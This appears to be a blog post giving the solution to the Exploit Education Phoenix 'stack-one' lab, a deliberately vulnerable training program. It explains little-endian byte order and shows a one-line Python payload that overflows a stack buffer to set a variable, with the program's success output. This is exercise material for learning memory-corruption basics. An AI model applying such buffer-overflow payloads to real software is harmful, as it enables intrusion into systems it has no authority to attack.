Exploit Education | Phoenix | Stack One Solution

Stack One

The description and source code can be found here:
https://exploit.education/phoenix/stack-one/

The last conditional shows the value that we need to set the “changeme” variable to:

if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
} else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
        locals.changeme);
}

We can use Python again to send non-printable characters to the “stack-one” program:

print "\x49\x6c\x59\x62"

However, we can’t just tack that onto the end of the 64 A’s. Because this architecture uses little-endian to store data in memory, we need to reverse the order of those bytes. We can solve the challenge like so:

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.